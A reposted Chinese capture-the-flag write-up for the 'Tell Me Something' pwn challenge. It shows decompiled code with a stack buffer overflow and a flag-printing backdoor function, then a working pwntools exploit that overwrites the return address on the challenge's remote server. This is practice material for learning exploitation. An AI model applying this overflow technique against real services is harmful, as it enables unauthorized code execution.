Tell Me Something
作者:互联网
file及checksec如下:
查看main函数:
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+0h] [rbp-88h] BYREF
write(1, "Input your message:\n", 0x14uLL);
read(0, &v4, 0x100uLL);
return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}
存在栈溢出漏洞
发现存在后门函数:
int good_game()
{
FILE *v0; // rbx
int result; // eax
char buf[9]; // [rsp+Fh] [rbp-9h] BYREF
v0 = fopen("flag.txt", "r");
while ( 1 )
{
result = fgetc(v0);
buf[0] = result;
if ( (_BYTE)result == 0xFF )
break;
write(1, buf, 1uLL);
}
return result;
}
我们的目的就是运行good_game函数
exp如下:
from pwn import *
elf = ELF('./guestbook')
#io = process('./guestbook')
io = connect('pwn.jarvisoj.com', 9876)
flag_addr = elf.symbols['good_game']
payload = b'a'*0x88 + p64(flag_addr)
io.sendlineafter('message:\n', payload)
io.interactive()
标签:Me,int,char,result,io,message,buf,Tell,Something 来源: https://www.cnblogs.com/hktk1643/p/14281375.html